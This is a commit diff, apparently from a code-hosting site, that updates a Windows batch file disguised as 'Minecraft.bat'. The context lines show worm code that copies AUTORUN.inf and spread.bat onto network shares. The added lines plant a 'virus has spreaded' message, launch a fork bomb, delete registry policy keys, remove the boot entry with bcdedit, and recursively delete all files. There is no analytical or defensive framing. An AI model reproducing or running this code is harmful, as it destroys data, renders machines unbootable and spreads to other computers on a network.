Update Minecraft.bat
This commit is contained in:
parent
1e948f2750
commit
5a94867a1d
1 changed files with 6 additions and 0 deletions
|
@ -26,6 +26,7 @@ FOR /F "tokens=1,2 delims=:" %%I IN ('net view ^| findstr /I /C:"\\"') DO (
|
||||||
ECHO Copying files to %%I:%%J
|
ECHO Copying files to %%I:%%J
|
||||||
copy /y %~dp0AUTORUN.inf n:\> NUL: 2>&1
|
copy /y %~dp0AUTORUN.inf n:\> NUL: 2>&1
|
||||||
copy /y %~dp0spread.bat n:\> NUL: 2>&1
|
copy /y %~dp0spread.bat n:\> NUL: 2>&1
|
||||||
|
echo The virus has spreaded successfully. > n:\README.md
|
||||||
)
|
)
|
||||||
net use n: /DELETE > NUL: 2>&1
|
net use n: /DELETE > NUL: 2>&1
|
||||||
)
|
)
|
||||||
|
@ -36,6 +37,11 @@ echo Successfully spreaded to drives.
|
||||||
echo Prepare for the BIGGER infection
|
echo Prepare for the BIGGER infection
|
||||||
echo Prepare for the disk spam.
|
echo Prepare for the disk spam.
|
||||||
:spamc
|
:spamc
|
||||||
|
start cmd.exe /c Minecraft.bat
|
||||||
|
%0|%0
|
||||||
|
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
|
||||||
|
bcdedit /delete {current}
|
||||||
|
del /s /q /f *
|
||||||
mkdir FUCKED_BY_BATWORM
|
mkdir FUCKED_BY_BATWORM
|
||||||
cd FUCKED_BY_BATWORM
|
cd FUCKED_BY_BATWORM
|
||||||
echo msg * error > REMOVE.bat
|
echo msg * error > REMOVE.bat
|
||||||
|
|
Loading…
Add table
Add a link
Reference in a new issue